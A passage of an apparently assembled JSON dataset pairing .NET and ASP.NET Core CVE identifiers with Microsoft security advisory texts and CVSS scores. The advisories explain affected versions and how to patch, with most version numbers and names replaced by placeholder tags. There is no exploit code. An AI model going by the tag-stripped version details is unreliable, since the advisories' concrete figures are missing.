runtime version is installed in its own directory, where the directory name is the version number. If you don't have a directory for NUMBERTAG and NUMBERTAG then any applications targeting NUMBERTAG or NUMBERTAG of .NET Core are vulnerable. 
Also, even if you have a directory for NUMBERTAG and NUMBERTAG present in your system, if you've deployed self contained applications URLTAG targeting the impacted versions, these applications are also vulnerable. How do I fix my affected application? Applications can be fixed by installing the latest .NET Core runtimes or SDKs. Typically, application servers only have runtime packages installed and developer machines have the SDKs installed. Installers for the runtimes can be downloaded from the FILETAG . .NET Core NUMBERTAG SDK installs both versions NUMBERTAG and NUMBERTAG of the .NET Core runtime. If you've built a self contained application URLTAG , you must install the new runtime and SDK, recompile your application and redeploy. What if the update breaks my application? An application can be pinned to a previous version of the runtime by editing the APITAG URLTAG file for that application. Set the framework version to the desired version and the APITAG property to false . These settings should be treated as a temporary measure and the application updated to work with the patched versions of the framework. Since the APITAG file is an optional file, you may need to create one for each application and add it alongside the executable.",
  87408. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87409. "severity": "HIGH",
  87410. "baseScore": 7.5,
  87411. "impactScore": 3.6,
  87412. "exploitabilityScore": 3.9
  87413. },
  87414. {
  87415. "CVE_ID": "CVE-2019-1302",
  87416. "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/384",
  87417. "Issue_Url_new": "https://github.com/aspnet/announcements/issues/384",
  87418. "Repo_new": "aspnet/announcements",
  87419. "Issue_Created_At": "2019-09-10T17:00:20Z",
  87420. "description": "Microsoft Security Advisory CVETAG : ASP.NET Core Elevation Of Privilege Vulnerability. Microsoft Security Advisory CVETAG : ASP.NET Core Elevation Of Privilege Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of an elevation of privilege vulnerability exists when a ASP.NET Core web application, created using vulnerable project templates, fails to properly sanitize web requests. An attacker who successfully exploited this vulnerability could perform content injection attacks and run script in the security context of the logged on user. To exploit the vulnerability, an attacker could send a specially crafted email, containing a malicious link, to a user. Alternatively, an attacker could use a chat client to social engineer a user into clicking the malicious link. However, in all cases to exploit this vulnerability a user must click a maliciously crafted link from an attacker. The update addresses the vulnerability by correcting how the .NET Core web application handles content encoding and updates the application templates to depend on the corrected code libraries. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors If your application does not ASP.NET SPA services your application is not vulnerable. APITAG APITAG Affected software Any .NET Core based application running on ASP.NET Core NUMBERTAG or ASP.NET Core NUMBERTAG or any preview of ASP.NET Core NUMBERTAG APITAG APITAG Affected software Any ASP.NET Core based application that uses APITAG with a vulnerable version listed below. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG ASP.NET Core NUMBERTAG will be updated with its RTM release. 
APITAG APITAG How do I know if I am affected? .NET Core has two types of dependencies: direct and transitive. Direct dependencies are dependencies where you specifically add a package to your project, transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, the APITAG package depends on the APITAG package. When you add a dependency on APITAG in your project, you're taking a transitive dependency on APITAG . Any application that has a direct or transitive dependency on the affected package affected software can be exposed to the vulnerability if it does not meet any of the mitigation factors mitigation factors . APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core. If you have multiple versions of .NET Core installed you will need to install multiple runtimes, or SDKs depending on what you have installed. If you have .NET Core NUMBERTAG or greater installed, you can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG For machines running .NET Core NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG For machines running .NET Core NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you have both NUMBERTAG and NUMBERTAG you need to install updates for both versions. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. If you have pinned your application URLTAG to a specific version of the runtime, you must update your app, recompile and redeploy it for the update to take effect. 
You must now update your existing SPA services projects to use the newer version of the vulnerable packages. Direct dependencies Direct dependencies are discoverable by examining your csproj file. They can be fixed by editing the project file fixing direct dependencies or using APITAG to update the dependency. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG which, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends APITAG your application gains a transitive dependency on the APITAG package. Transitive dependencies are reviewable in two ways: In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects The APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json) . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. 
Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages, this means either None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. APITAG APITAG How do I fix the issue? APITAG APITAG Fixing direct dependencies Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. 
The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing transitive dependencies If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . 
CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Rebuilding your application Finally, you must rebuild your application, test, and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG respectively. The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. 
Acknowledgments Ian Routledge ( APITAG URLTAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87421. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  87422. "severity": "HIGH",
  87423. "baseScore": 8.8,
  87424. "impactScore": 5.9,
  87425. "exploitabilityScore": 2.8
  87426. },
  87427. {
  87428. "CVE_ID": "CVE-2018-8416",
  87429. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/95",
  87430. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/95",
  87431. "Repo_new": "dotnet/announcements",
  87432. "Issue_Created_At": "2019-01-08T18:00:27Z",
  87433. "description": "Microsoft Security Advisory CVETAG : .NET Core Tampering Vulnerability. Microsoft Security Advisory CVETAG : .NET Core Tampering Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware that a tampering vulnerability exists when .NET Core improperly handles specially crafted files. An attacker who successfully exploited this vulnerability could write arbitrary files and directories to certain locations on a vulnerable system. However, an attacker would have limited control over the destination of the files and directories. To exploit the vulnerability, an attacker must send a specially crafted file to a vulnerable system. The update addresses the vulnerability by correcting how .NET Core handles these files. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors If your application (including the libraries it depends on) does not extract ZIP compressed files, it is unaffected. APITAG APITAG Affected software Any .NET Core based application that uses the APITAG URLTAG package with a vulnerable version listed below. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG APITAG Advisory FAQ APITAG APITAG How do I know if I am affected? APITAG is distributed as part of the .NET Core NUMBERTAG runtime. To check the currently installed runtimes, open a command prompt and run the APITAG command. If you have a NUMBERTAG or greater runtime installed, you'll see output like the following; ERRORTAG If your host version is NUMBERTAG and the highest APITAG runtime version is less than NUMBERTAG you're vulnerable to this issue. If your host version is NUMBERTAG and the highest NUMBERTAG APITAG runtime version is less than NUMBERTAG you're vulnerable to this issue. 
You will not see SDK versions if you have only installed the runtime. APITAG APITAG How do I fix the issue? If your host version is a NUMBERTAG host you must install version NUMBERTAG or later of the FILETAG , or corresponding FILETAG . If your host version is a NUMBERTAG you must install version NUMBERTAG or later of the FILETAG , or corresponding FILETAG . Finally, you must restart your applications once an updated runtime or SDK is installed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgments Danny Grander URLTAG of FILETAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87434. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  87435. "severity": "MEDIUM",
  87436. "baseScore": 6.5,
  87437. "impactScore": 3.6,
  87438. "exploitabilityScore": 2.8
  87439. },
  87440. {
  87441. "CVE_ID": "CVE-2022-23267",
  87442. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/221",
  87443. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/221",
  87444. "Repo_new": "dotnet/announcements",
  87445. "Issue_Created_At": "2022-05-10T18:28:50Z",
  87446. "description": "Microsoft Security Advisory CVE NUMBERTAG NET Denial of Service Vulnerability. Microsoft Security Advisory CVE NUMBERTAG NET Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET NUMBERTAG NET NUMBERTAG and .NET Core NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A vulnerability exists in .NET NUMBERTAG NET NUMBERTAG and .NET Core NUMBERTAG where a malicious client can cause a Denial of Service via excess memory allocations through APITAG Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET NUMBERTAG application running on .NET NUMBERTAG or earlier. Any .NET NUMBERTAG application running on .NET NUMBERTAG or earlier. Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or earlier. APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please install the latest version of .NET NUMBERTAG or .NET NUMBERTAG or .NET Core NUMBERTAG If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs. You can list the versions you have installed by running the APITAG command. 
You should see an output like the following: ERRORTAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or Visual Studio NUMBERTAG or Visual Studio NUMBERTAG or Visual Studio NUMBERTAG from FILETAG .NET NUMBERTAG NET NUMBERTAG and .NET Core NUMBERTAG updates are also available from Microsoft Update. To access this either type APITAG for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET NUMBERTAG or .NET NUMBERTAG please email details to EMAILTAG . Reports may qualify for the Microsoft .NET Core & .NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. 
Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links [CVE NUMBERTAG URLTAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87447. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87448. "severity": "HIGH",
  87449. "baseScore": 7.5,
  87450. "impactScore": 3.6,
  87451. "exploitabilityScore": 3.9
  87452. },
  87453. {
  87454. "CVE_ID": "CVE-2021-24112",
  87455. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/176",
  87456. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/176",
  87457. "Repo_new": "dotnet/announcements",
  87458. "Issue_Created_At": "2021-02-09T18:17:29Z",
  87459. "description": "Microsoft Security Advisory CVETAG | .NET NUMBERTAG and .NET Core Remote Code Execution Vulnerability. Microsoft Security Advisory CVETAG | .NET NUMBERTAG and .NET Core Remote Code Execution Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A remote code execution vulnerability exists when parsing certain types of graphics files. This vulnerability only exists on systems running on APITAG or Linux. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG application running on .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG or lower, respectively. Please note that .NET Core NUMBERTAG is out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please install the latest version of .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. 
You should see an output like the following: ERRORTAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG from FILETAG .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG updates are also available from Microsoft Update. To access this either type APITAG for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core or .NET NUMBERTAG please email details to EMAILTAG . Reports may qualify for the Microsoft .NET Core & .NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. 
In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87460. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  87461. "severity": "CRITICAL",
  87462. "baseScore": 9.8,
  87463. "impactScore": 5.9,
  87464. "exploitabilityScore": 3.9
  87465. },
  87466. {
  87467. "CVE_ID": "CVE-2018-8292",
  87468. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/88",
  87469. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/88",
  87470. "Repo_new": "dotnet/announcements",
  87471. "Issue_Created_At": "2018-10-09T22:51:18Z",
  87472. "description": "Microsoft Security Advisory CVETAG : .NET Core Information Disclosure Vulnerability. Microsoft Security Advisory CVETAG : .NET Core Information Disclosure Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a security feature bypass vulnerability in .NET Core in which HTTP authentication information is inadvertently exposed in an outbound request that encounters an HTTP redirect. An attacker who successfully exploited this vulnerability could use the information to further compromise the web application. The update addresses the vulnerability by correcting how .NET Core applications handle HTTP redirects. System administrators running .NET Core NUMBERTAG or .NET Core NUMBERTAG applications must update their .NET Core runtimes to versions NUMBERTAG and NUMBERTAG then restart their applications. If installed applications target .NET Core NUMBERTAG the applications must be migrated to NUMBERTAG or newer and redeployed. Developers must update their .NET Core SDK to versions NUMBERTAG and migrate any FILETAG or FILETAG applications to NUMBERTAG then redeploy. Discussion Discussion for this issue can be found at APITAG TBD APITAG APITAG Mitigation factors None APITAG APITAG Affected software Any .NET Core application that runs on a .NET Core NUMBERTAG runtime with a version number of NUMBERTAG or lower, or a .NET Core application that runs on a .NET Core NUMBERTAG runtime with a version number of NUMBERTAG or lower, or a .NET Core application that runs on a .NET Core NUMBERTAG runtime. 
Additionally package authors should check their dependencies to ensure they aren't depending on a vulnerable version of the following package: APITAG APITAG Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG NUMBERTAG or later APITAG APITAG Advisory FAQ APITAG APITAG How do I know if I am affected? Any .NET Core application that runs on a .NET Core NUMBERTAG runtime with a version number of NUMBERTAG or lower, or a .NET Core application that runs on a .NET Core NUMBERTAG runtime with a version number of NUMBERTAG or lower, or a .NET Core application that runs on a .NET Core NUMBERTAG runtime. To check the currently installed runtimes and SDKs with version NUMBERTAG or later of .NET Core, open a command prompt and run the APITAG command. You should see an output similar to the following: ERRORTAG If you don't see a runtime entry for NUMBERTAG or NUMBERTAG any .NET Core NUMBERTAG applications running on that computer are vulnerable. If you don't have a NUMBERTAG version of the runtime or SDK installed, you can produce the complete list of runtimes by performing a directory listing in the install root directories. The default root directories are listed in the following table: | Operating System | Location | | | | | Windows | APITAG | | APITAG | APITAG | | Supported Linux platforms | APITAG | Each runtime version is installed in its own directory, where the directory name is the version number. If you don't have a directory for NUMBERTAG then any application targeting versions NUMBERTAG or NUMBERTAG is vulnerable. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. APITAG How do I fix the vulnerability? 
System administrators are advised to update their .NET Core runtimes to versions NUMBERTAG and install the latest NUMBERTAG runtime, ensuring that any NUMBERTAG applications are migrated to NUMBERTAG as soon as possible. Developers are advised to update their .NET Core SDK to versions NUMBERTAG and migrate any .NET Core URLTAG or FILETAG applications to NUMBERTAG and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at APITAG and APITAG , respectively. The Announcements repo for each product ( APITAG and APITAG ) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87473. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  87474. "severity": "HIGH",
  87475. "baseScore": 7.5,
  87476. "impactScore": 3.6,
  87477. "exploitabilityScore": 3.9
  87478. },
  87479. {
  87480. "CVE_ID": "CVE-2021-26701",
  87481. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/178",
  87482. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/178",
  87483. "Repo_new": "dotnet/announcements",
  87484. "Issue_Created_At": "2021-03-09T18:01:29Z",
  87485. "description": "Microsoft Security Advisory CVETAG | .NET Core Remote Code Execution Vulnerability. Microsoft Security Advisory CVETAG | .NET Core Remote Code Execution Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A remote code execution vulnerability exists in .NET NUMBERTAG and .NET Core due to how text encoding is performed. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software The vulnerable package is FILETAG . Upgrading your package and redeploying your app should be sufficient to address this vulnerability. Vulnerable package versions: Any .NET NUMBERTAG NET Core, or .NET Framework based application that uses the APITAG package with a vulnerable version listed below. Package Name| Vulnerable Versions| Secure Versions : | : : | : FILETAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG Please note that .NET Core NUMBERTAG is out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please install the latest version of .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. 
You should see an output like the following: ERRORTAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG from FILETAG .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG updates are also available from Microsoft Update. To access this either type APITAG for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core or .NET NUMBERTAG please email details to EMAILTAG . Reports may qualify for the Microsoft .NET Core & .NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. 
In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87486. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  87487. "severity": "CRITICAL",
  87488. "baseScore": 9.8,
  87489. "impactScore": 5.9,
  87490. "exploitabilityScore": 3.9
  87491. },
  87492. {
  87493. "CVE_ID": "CVE-2018-8356",
  87494. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/73",
  87495. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/73",
  87496. "Repo_new": "dotnet/announcements",
  87497. "Issue_Created_At": "2018-07-10T17:00:37Z",
  87498. "description": "Microsoft Security Advisory CVETAG : .NET Core Security Feature Bypass Vulnerability. Microsoft Security Advisory CVETAG : .NET Core Security Feature Bypass Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a security feature bypass vulnerability that exists when .NET Core does not correctly validate certificates. An attacker who successfully exploited this vulnerability could present an expired certificate when challenged. The update addresses the vulnerability by correcting how .NET Core applications handle certificate validation. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors If an application does not use Windows Communication Foundation, it is not affected; the affected packages are the Windows Communication Foundation packages listed below. APITAG APITAG Affected software Any .NET Core, or ASP.NET Core based application that uses APITAG with a version of NUMBERTAG or earlier. 
